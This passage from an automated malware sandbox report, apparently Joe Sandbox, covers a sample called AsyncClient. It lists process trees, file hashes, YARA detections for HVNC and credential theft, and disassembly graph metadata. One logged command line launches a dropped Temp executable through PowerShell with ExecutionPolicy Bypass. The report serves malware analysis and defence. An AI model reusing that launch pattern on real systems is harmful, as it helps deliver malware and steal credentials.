                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:4
                                                          Start time:05:59:01
                                                          Start date:13/12/2024
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\hklugq.exe"'
                                                          Imagebase:0xc00000
                                                          File size:433'152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:5
                                                          Start time:05:59:02
                                                          Start date:13/12/2024
                                                          Path:C:\Users\user\AppData\Local\Temp\hklugq.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\AppData\Local\Temp\hklugq.exe"
                                                          Imagebase:0x960000
                                                          File size:717'824 bytes
                                                          MD5 hash:5890798F97F9144206499433A5DB3011
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_HVNC, Description: Yara detected HVNC, Source: 00000005.00000002.1648992753.0000000003D93000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.1648992753.0000000003D93000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000005.00000002.1648992753.0000000003D93000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000005.00000002.1648992753.0000000003D93000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 75%, ReversingLabs
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:6
                                                          Start time:05:59:02
                                                          Start date:13/12/2024
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                          Imagebase:0x7ff67e6d0000
                                                          File size:55'320 bytes
                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:7
                                                          Start time:05:59:02
                                                          Start date:13/12/2024
                                                          Path:C:\Windows\explorer.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\explorer.exe"
                                                          Imagebase:0x7ff62d7d0000
                                                          File size:5'141'208 bytes
                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:9
                                                          Start time:05:59:03
                                                          Start date:13/12/2024
                                                          Path:C:\Windows\explorer.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\explorer.exe /NoUACCheck
                                                          Imagebase:0x7ff62d7d0000
                                                          File size:5'141'208 bytes
                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:11
                                                          Start time:05:59:08
                                                          Start date:13/12/2024
                                                          Path:C:\Users\user\AppData\Local\Temp\hklugq.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\AppData\Local\Temp\hklugq.exe"
                                                          Imagebase:0x9c0000
                                                          File size:717'824 bytes
                                                          MD5 hash:5890798F97F9144206499433A5DB3011
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_HVNC, Description: Yara detected HVNC, Source: 0000000B.00000002.3882310558.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.3882310558.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000B.00000002.3882310558.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000000B.00000002.3882310558.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                          Reputation:low
                                                          Has exited:false

                                                          General

                                                          Target ID:12
                                                          Start time:05:59:08
                                                          Start date:13/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6ee680000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:false

                                                          Disassembly

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:11.4%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:100%
                                                            Total number of Nodes:3
                                                            Total number of Limit Nodes:0
                                                            execution_graph 46820 28cbe40 46821 28cbe59 _vcprintf_l 46820->46821 46823 28cbe9b 46821->46823

                                                            Executed Functions

                                                            Function 06ABA2A8 Relevance: 8.3, Strings: 6, Instructions: 791COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 6aba2a8-6aba323 8 6aba32b-6abaf6a 0->8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3890628794.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6ab0000_AsyncClient.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: +yVl^$;yVl^$KyVl^$[yVl^$kyVl^${yVl^
                                                            • API String ID: 0-3398449855
                                                            • Opcode ID: ff868b7adbf6cddbf7b1f78128338dc08a793f4225a7cdd35b4c0cc84d4d3f0c
                                                            • Instruction ID: a71a5d3b3a27892750723eac0a826be3d64dddf4ecea60d35d71fbb8491f8e82
                                                            • Opcode Fuzzy Hash: ff868b7adbf6cddbf7b1f78128338dc08a793f4225a7cdd35b4c0cc84d4d3f0c
                                                            • Instruction Fuzzy Hash: CB6254B06003009BD789EF18D85475ABAD6EFC5319F64C55CD00A9F392CBBBDA0B9B91
                                                            Function 06ABA2B8 Relevance: 8.3, Strings: 6, Instructions: 780COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 164 6aba2b8-6aba323 171 6aba32b-6abaf6a 164->171
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3890628794.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6ab0000_AsyncClient.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: +yVl^$;yVl^$KyVl^$[yVl^$kyVl^${yVl^
                                                            • API String ID: 0-3398449855
                                                            • Opcode ID: cc527c10ee4e0ca5a24ec6b32a4372055d18f9b312a982f4f605bc1eea932a44
                                                            • Instruction ID: 1051b22a27b4ca86a1e8deb1f03e6b6f6fc505d49b0cde575d1f925e40a720a9
                                                            • Opcode Fuzzy Hash: cc527c10ee4e0ca5a24ec6b32a4372055d18f9b312a982f4f605bc1eea932a44
                                                            • Instruction Fuzzy Hash: 266244B06003009BD789EF58D85871ABAD6EFC5319F64C55CD00A9F392CBBBDA079B91
                                                            Function 028CC190 Relevance: 2.8, Strings: 2, Instructions: 339COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 470 28cc190-28cc19d 471 28cc19f-28cc1d2 470->471 472 28cc140-28cc18a 470->472 475 28cc1d8-28cc1ec 471->475 476 28cc671-28cc68f 471->476 477 28cc1ee 475->477 478 28cc1f3-28cc2aa 475->478 482 28cca9c-28ccaa8 476->482 477->478 525 28cc630-28cc654 478->525 526 28cc2b0-28cc2b9 478->526 484 28cc69d-28cc6a9 482->484 485 28ccaae-28ccac2 482->485 488 28cc6af-28cc72f 484->488 489 28cca89-28cca8e 484->489 507 28cc747-28cc760 488->507 508 28cc731-28cc737 488->508 494 28cca99 489->494 494->482 513 28cc790-28cc7ce 507->513 514 28cc762-28cc78b 507->514 509 28cc739 508->509 510 28cc73b-28cc73d 508->510 509->507 510->507 530 28cc7d0-28cc7f1 513->530 531 28cc7f3-28cc800 513->531 514->494 535 28cc65b-28cc661 525->535 527 28cc2bb-28cc2bf 526->527 528 28cc2c0-28cc2c5 526->528 527->528 533 28cc2ca-28cc2ea 528->533 534 28cc2c7 528->534 547 28cc807-28cc80d 530->547 531->547 541 28cc2ec 533->541 542 28cc2ef-28cc2f8 533->542 534->533 537 28cc66e-28cc66f 535->537 538 28cc663 535->538 537->476 538->537 541->542 543 28cc2fe-28cc31c 542->543 544 28cc5b2-28cc5bd 542->544 548 28cc35c-28cc365 543->548 549 28cc31e-28cc320 543->549 552 28cc5bf 544->552 553 28cc5c2-28cc5eb call 28c0298 544->553 550 28cc82c-28cc87e 547->550 551 28cc80f-28cc82a 547->551 556 28cc36b-28cc37b 548->556 557 28cc656 548->557 549->548 554 28cc322-28cc32b 549->554 587 28cc999-28cc9d8 550->587 588 28cc884-28cc889 550->588 551->550 552->553 583 28cc5f3-28cc5f9 553->583 560 28cc3b8-28cc3fb 554->560 561 28cc331 554->561 556->557 563 28cc381-28cc392 556->563 557->535 575 28cc3fd-28cc410 560->575 576 28cc416-28cc438 560->576 566 28cc334-28cc336 561->566 563->557 564 28cc398-28cc3a8 563->564 564->557 568 28cc3ae-28cc3b5 564->568 571 28cc33c-28cc347 566->571 572 28cc338 566->572 568->560 571->557 574 28cc34d-28cc358 571->574 572->571 574->566 579 28cc35a 574->579 575->576 581 28cc43a-28cc441 576->581 582 28cc447-28cc4c3 576->582 579->560 581->582 590 28cc51e-28cc530 582->590 591 28cc4c5-28cc4c7 582->591 585 28cc5fb-28cc623 583->585 586 28cc625-28cc62a 583->586 585->586 586->525 608 28cc9da-28cc9f2 587->608 609 28cc9f4-28cca03 587->609 593 28cc893-28cc896 588->593 590->557 595 28cc536-28cc553 590->595 591->590 596 28cc4c9-28cc4d6 591->596 597 28cc89c 593->597 598 28cc961-28cc989 593->598 595->557 600 28cc559-28cc575 595->600 601 28cc4dc 596->601 602 28cc5a3-28cc5ac 596->602 604 28cc8d4-28cc900 597->604 605 28cc905-28cc931 597->605 606 28cc8a3-28cc8cf 597->606 607 28cc933-28cc95f 597->607 612 28cc98f-28cc993 598->612 600->557 610 28cc57b-28cc599 600->610 611 28cc4e2-28cc4e4 601->611 602->543 602->544 604->612 605->612 606->612 607->612 614 28cca0c-28cca6e 608->614 609->614 610->557 617 28cc59f 610->617 618 28cc4ee-28cc50a 611->618 619 28cc4e6-28cc4ea 611->619 612->587 612->593 626 28cca79-28cca87 614->626 617->602 618->557 622 28cc510-28cc517 618->622 619->618 622->611 624 28cc519 622->624 624->602 626->494
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3883685729.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_28c0000_AsyncClient.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LIZh$+kup^
                                                            • API String ID: 0-2211199166
                                                            • Opcode ID: f5e3df68b88f3b28b84b837bd69ba9e2377db7be4d5f6e35960e0d5c28064475
                                                            • Instruction ID: 5fc42ac3ae68799cf967d737e405911dca40f05771a75d80f303eee7b15933d3
                                                            • Opcode Fuzzy Hash: f5e3df68b88f3b28b84b837bd69ba9e2377db7be4d5f6e35960e0d5c28064475
                                                            • Instruction Fuzzy Hash: 77D15D79A102299FDB14DF68D984BADBBF2BF88704F1581AAE409EB351DB30DD45CB40
                                                            Function 028CC1A0 Relevance: 2.0, Strings: 1, Instructions: 716COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 628 28cc1a0-28cc1d2 630 28cc1d8-28cc1ec 628->630 631 28cc671-28cc68f 628->631 632 28cc1ee 630->632 633 28cc1f3-28cc2aa 630->633 635 28cca9c-28ccaa8 631->635 632->633 677 28cc630-28cc654 633->677 678 28cc2b0-28cc2b9 633->678 637 28cc69d-28cc6a9 635->637 638 28ccaae-28ccac2 635->638 640 28cc6af-28cc72f 637->640 641 28cca89-28cca8e 637->641 659 28cc747-28cc760 640->659 660 28cc731-28cc737 640->660 646 28cca99 641->646 646->635 665 28cc790-28cc7ce 659->665 666 28cc762-28cc78b 659->666 661 28cc739 660->661 662 28cc73b-28cc73d 660->662 661->659 662->659 682 28cc7d0-28cc7f1 665->682 683 28cc7f3-28cc800 665->683 666->646 687 28cc65b-28cc661 677->687 679 28cc2bb-28cc2bf 678->679 680 28cc2c0-28cc2c5 678->680 679->680 685 28cc2ca-28cc2ea 680->685 686 28cc2c7 680->686 699 28cc807-28cc80d 682->699 683->699 693 28cc2ec 685->693 694 28cc2ef-28cc2f8 685->694 686->685 689 28cc66e-28cc66f 687->689 690 28cc663 687->690 689->631 690->689 693->694 695 28cc2fe-28cc31c 694->695 696 28cc5b2-28cc5bd 694->696 700 28cc35c-28cc365 695->700 701 28cc31e-28cc320 695->701 704 28cc5bf 696->704 705 28cc5c2-28cc5eb call 28c0298 696->705 702 28cc82c-28cc87e 699->702 703 28cc80f-28cc82a 699->703 708 28cc36b-28cc37b 700->708 709 28cc656 700->709 701->700 706 28cc322-28cc32b 701->706 739 28cc999-28cc9d8 702->739 740 28cc884-28cc889 702->740 703->702 704->705 735 28cc5f3-28cc5f9 705->735 712 28cc3b8-28cc3fb 706->712 713 28cc331 706->713 708->709 715 28cc381-28cc392 708->715 709->687 727 28cc3fd-28cc410 712->727 728 28cc416-28cc438 712->728 718 28cc334-28cc336 713->718 715->709 716 28cc398-28cc3a8 715->716 716->709 720 28cc3ae-28cc3b5 716->720 723 28cc33c-28cc347 718->723 724 28cc338 718->724 720->712 723->709 726 28cc34d-28cc358 723->726 724->723 726->718 731 28cc35a 726->731 727->728 733 28cc43a-28cc441 728->733 734 28cc447-28cc4c3 728->734 731->712 733->734 742 28cc51e-28cc530 734->742 743 28cc4c5-28cc4c7 734->743 737 28cc5fb-28cc623 735->737 738 28cc625-28cc62a 735->738 737->738 738->677 760 28cc9da-28cc9f2 739->760 761 28cc9f4-28cca03 739->761 745 28cc893-28cc896 740->745 742->709 747 28cc536-28cc553 742->747 743->742 748 28cc4c9-28cc4d6 743->748 749 28cc89c 745->749 750 28cc961-28cc989 745->750 747->709 752 28cc559-28cc575 747->752 753 28cc4dc 748->753 754 28cc5a3-28cc5ac 748->754 756 28cc8d4-28cc900 749->756 757 28cc905-28cc931 749->757 758 28cc8a3-28cc8cf 749->758 759 28cc933-28cc95f 749->759 764 28cc98f-28cc993 750->764 752->709 762 28cc57b-28cc599 752->762 763 28cc4e2-28cc4e4 753->763 754->695 754->696 756->764 757->764 758->764 759->764 766 28cca0c-28cca6e 760->766 761->766 762->709 769 28cc59f 762->769 770 28cc4ee-28cc50a 763->770 771 28cc4e6-28cc4ea 763->771 764->739 764->745 778 28cca79-28cca87 766->778 769->754 770->709 774 28cc510-28cc517 770->774 771->770 774->763 776 28cc519 774->776 776->754 778->646
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3883685729.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_28c0000_AsyncClient.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LIZh
                                                            • API String ID: 0-2364592738
                                                            • Opcode ID: 44e8f9078b0c41f0acae5c239eda329d4937679fbb4530ce4431211085219e23
                                                            • Instruction ID: 3e1177ccb85ef6065a7b9ef07e5f6e310819b5403b2e0697b04d7c78684cfa83
                                                            • Opcode Fuzzy Hash: 44e8f9078b0c41f0acae5c239eda329d4937679fbb4530ce4431211085219e23
                                                            • Instruction Fuzzy Hash: A8520779A00214DFDB19DF68C984E69BBB2FF88314F1581A9E509EB262DB31EC51DF40
                                                            Function 028CBE2F Relevance: 1.7, APIs: 1, Instructions: 155COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 780 28cbe2f-28cbe51 781 28cbe59-28cc0b9 _vcprintf_l 780->781
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3883685729.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_28c0000_AsyncClient.jbxd
                                                            Similarity
                                                            • API ID: _vcprintf_l
                                                            • String ID:
                                                            • API String ID: 285670189-0
                                                            • Opcode ID: c63e0ee5767577c46180557473c85df4e6505423d69b06df3812c9094235c335
                                                            • Instruction ID: 301c8ee5a76bf1187cb6cb7b6deeefefcff210f47d9d164054ed7e7a758f6d3e
                                                            • Opcode Fuzzy Hash: c63e0ee5767577c46180557473c85df4e6505423d69b06df3812c9094235c335
                                                            • Instruction Fuzzy Hash: 25613870A143058FE708EFBAE94169EBFE3BBC8210F04C169E4049B369EF345A46DB55
                                                            Function 028CBE40 Relevance: 1.6, APIs: 1, Instructions: 150COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 811 28cbe40-28cbe51 812 28cbe59-28cc0b9 _vcprintf_l 811->812
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3883685729.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_28c0000_AsyncClient.jbxd
                                                            Similarity
                                                            • API ID: _vcprintf_l
                                                            • String ID:
                                                            • API String ID: 285670189-0
                                                            • Opcode ID: 5dea07380eab28a2218eae7a2692317a22389d5d3af1294e2370acbd16199dff
                                                            • Instruction ID: 0893c7db0bd9ad9581498a56636948e8f3a3f4c4ded3cffbf5a3e53cca6de1e1
                                                            • Opcode Fuzzy Hash: 5dea07380eab28a2218eae7a2692317a22389d5d3af1294e2370acbd16199dff
                                                            • Instruction Fuzzy Hash: B3511570A147058FE708EFBAE84169EBFE3BBC8210F04C169E404DB369EF355A469B55
                                                            Function 06B68C98 Relevance: .7, Instructions: 734COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1254 6b68c98-6b68cc2 1255 6b69106-6b6910a 1254->1255 1256 6b68cc8 1254->1256 1257 6b69110-6b69120 1255->1257 1258 6b691ef-6b691fc 1255->1258 1259 6b68cd0-6b68cd9 1256->1259 1264 6b69237-6b69248 1257->1264 1267 6b69126-6b69133 1257->1267 1258->1264 1265 6b691fe-6b69213 1258->1265 1261 6b68d50-6b68d5c 1259->1261 1262 6b68cdb-6b68ce4 1259->1262 1261->1255 1266 6b68d62-6b68d6e 1261->1266 1268 6b68cea-6b68d1a 1262->1268 1269 6b69249-6b6928b 1262->1269 1265->1264 1285 6b69215-6b6922f 1265->1285 1266->1269 1270 6b68d74-6b68d97 1266->1270 1267->1264 1278 6b69139-6b6914e 1267->1278 1275 6b68d47-6b68d4e 1268->1275 1276 6b68d1c-6b68d28 1268->1276 1289 6b69291 1269->1289 1290 6b6928d-6b6928f 1269->1290 1280 6b68d9d-6b68da9 1270->1280 1281 6b68e9b-6b68eb0 1270->1281 1275->1261 1275->1262 1276->1275 1293 6b68d2a-6b68d46 call 6b66ed8 1276->1293 1302 6b691c4-6b691ed call 6b66ed8 1278->1302 1303 6b69150-6b69169 1278->1303 1286 6b68dab-6b68db0 1280->1286 1287 6b68db8-6b68dc1 1280->1287 1281->1269 1288 6b68eb6-6b68f46 call 6b60040 1281->1288 1285->1264 1286->1287 1287->1269 1291 6b68dc7-6b68dd0 1287->1291 1371 6b68f4b-6b68f4e 1288->1371 1292 6b69294-6b692ad 1289->1292 1290->1292 1294 6b68dd2-6b68ddf 1291->1294 1295 6b68de1 1291->1295 1313 6b692af-6b692b9 1292->1313 1314 6b692bb-6b692c2 1292->1314 1300 6b68de3-6b68de5 1294->1300 1295->1300 1306 6b68df6-6b68e96 call 6b60040 1300->1306 1307 6b68de7-6b68df3 1300->1307 1302->1264 1303->1302 1321 6b6916b-6b691c2 1303->1321 1306->1371 1307->1306 1313->1314 1316 6b692c3-6b692ca 1313->1316 1320 6b693a8-6b693b3 1316->1320 1324 6b692cf-6b692d8 1320->1324 1325 6b693b9-6b693c0 1320->1325 1321->1264 1321->1302 1328 6b692e7-6b692ed 1324->1328 1329 6b692da-6b692df 1324->1329 1332 6b692f3-6b692fb 1328->1332 1333 6b693c1-6b69ab4 1328->1333 1329->1328 1336 6b693a7 1332->1336 1337 6b69301-6b6930a 1332->1337 1366 6b69b9c-6b69c53 1333->1366 1367 6b69aba-6b69b85 1333->1367 1336->1320 1337->1333 1340 6b69310-6b69317 1337->1340 1340->1336 1341 6b6931d-6b69321 1340->1341 1346 6b69323-6b69339 1341->1346 1347 6b6934d-6b6936f 1341->1347 1349 6b6933f 1346->1349 1350 6b6933b-6b6933d 1346->1350 1347->1333 1352 6b69371-6b69388 1347->1352 1355 6b69342-6b6934a call 6b68310 1349->1355 1350->1355 1364 6b69397-6b693a4 1352->1364 1365 6b6938a-6b6938f 1352->1365 1355->1347 1364->1336 1365->1364 1432 6b69c5e-6b69c75 1366->1432 1367->1432 1438 6b69b8b-6b69b97 1367->1438 1375 6b690f4-6b69100 1371->1375 1376 6b68f54-6b68f5a 1371->1376 1375->1255 1375->1266 1378 6b68f5c-6b68f71 call 6b65540 1376->1378 1379 6b68f9d-6b68fa3 1376->1379 1384 6b690a6-6b690b3 1378->1384 1392 6b68f77-6b68f98 call 6b66ed8 1378->1392 1379->1384 1385 6b68fa9-6b68fb8 1379->1385 1399 6b690b5-6b690ca 1384->1399 1400 6b690ea-6b690f3 1384->1400 1385->1269 1386 6b68fbe-6b68fc5 1385->1386 1386->1384 1391 6b68fcb-6b68fda 1386->1391 1391->1269 1395 6b68fe0-6b68ff2 1391->1395 1392->1384 1406 6b68ff4-6b69009 1395->1406 1407 6b69015-6b69024 1395->1407 1399->1400 1414 6b690cc-6b690e2 1399->1414 1406->1269 1411 6b6900f-6b69013 1406->1411 1407->1269 1413 6b6902a-6b6903a 1407->1413 1415 6b6903d-6b69053 1411->1415 1413->1415 1414->1400 1423 6b69055-6b69058 1415->1423 1424 6b6905a-6b69067 1415->1424 1425 6b6906a-6b6906f 1423->1425 1424->1425 1425->1384 1427 6b69071-6b69083 call 6b65540 1425->1427 1427->1384 1434 6b69085-6b6909e call 6b66ed8 1427->1434 1440 6b69c77 1432->1440 1441 6b69c7f-6b69c8b 1432->1441 1434->1384 1438->1432 1440->1441
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3891058345.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6b60000_AsyncClient.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9cbbd6f6db3d9c0adcdc8e58978f83e138827dd3d895b4a3eb171f448f02ec27
                                                            • Instruction ID: 2489704e685e08e42cef307aff253ef616ab9e643c92f6aafae5e5f4a7d11459
                                                            • Opcode Fuzzy Hash: 9cbbd6f6db3d9c0adcdc8e58978f83e138827dd3d895b4a3eb171f448f02ec27
                                                            • Instruction Fuzzy Hash: 78625C74A00706DFCB55DF69C584A6AFBF2FF88300B158599E50A9B762DB34EC41CB90
                                                            Function 06B6A090 Relevance: .6, Instructions: 641COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3891058345.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6b60000_AsyncClient.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0b9be2b26787a3e14c13604c81591fe1a4b163c3593daac84db14de2403e8da7
                                                            • Instruction ID: 58e2c6641594864c760a0a4e677be20c67e528d22bf1211c503dabc59cdbb6fb
                                                            • Opcode Fuzzy Hash: 0b9be2b26787a3e14c13604c81591fe1a4b163c3593daac84db14de2403e8da7
                                                            • Instruction Fuzzy Hash: A6426F74A01201DFDB95EF69C584A69BBF2FF89300F1584A9E506EB3A5DB34DC41CB50
                                                            Function 06B64A98 Relevance: .6, Instructions: 629COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3891058345.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6b60000_AsyncClient.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e0a3b98369cd6c7f8f5e780f83c14e525ef35e2174eef57ecc4a98932bef0d38
                                                            • Instruction ID: 16102d76d0e73b0acf00c7bb7059915fc99c039e61e7b944c683d4706f1980d8
                                                            • Opcode Fuzzy Hash: e0a3b98369cd6c7f8f5e780f83c14e525ef35e2174eef57ecc4a98932bef0d38
                                                            • Instruction Fuzzy Hash: 41429DB2A00701DFDBA5DF7AC54466ABBF2FF85305F5484A9E146CB650CB39E881CB50
                                                            Function 06AB9A98 Relevance: .4, Instructions: 424COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3890628794.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6ab0000_AsyncClient.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9d39676310f8b6dfe43cdf42d1cd3d95ac949a4ea780c011bd966b00ab58e315
                                                            • Instruction ID: 1e9b5bd1c4c99b5b3e605c2d769ac2d93b82dd38dc7a638afa329444413abcfd
                                                            • Opcode Fuzzy Hash: 9d39676310f8b6dfe43cdf42d1cd3d95ac949a4ea780c011bd966b00ab58e315
                                                            • Instruction Fuzzy Hash: 44F19F30A013199FDB55EF68D840B9EBBF6BF85310F148169E505DB2A2DB30ED45CB91
                                                            Function 06B67318 Relevance: .4, Instructions: 405COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3891058345.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6b60000_AsyncClient.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5651e651e91dbf71c40959ad24c45f54c78e295a8db44c51157ebe7d8ca26fbe
                                                            • Instruction ID: 978fe2bc7cff23712b8cdf7b577b1ee65a07cd0c6cd713e36f32fa8f76ad834a
                                                            • Opcode Fuzzy Hash: 5651e651e91dbf71c40959ad24c45f54c78e295a8db44c51157ebe7d8ca26fbe
                                                            • Instruction Fuzzy Hash: A5029DB5A00705DFDB65CF6AC584A6ABBF2FF48304F1485A9E4568B761DB38E841CF40
                                                            Function 06B62948 Relevance: .4, Instructions: 401COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3891058345.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6b60000_AsyncClient.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b08bd9237d7c227a08234779e01c8f6e44f61c0c54da5820aa305e2453a74c1b
                                                            • Instruction ID: c3961361587a84e862637ca201e49bafd55a166fc219972e5f51088fb0dd4a89
                                                            • Opcode Fuzzy Hash: b08bd9237d7c227a08234779e01c8f6e44f61c0c54da5820aa305e2453a74c1b
                                                            • Instruction Fuzzy Hash: A8F13D74E002059FEB58EFA5C854A6DBBB2FF88305F108469E906AF355DB34DD46CB50
                                                            Function 028C5CF0 Relevance: .3, Instructions: 281COMMON
                                                            Download Yara Rule
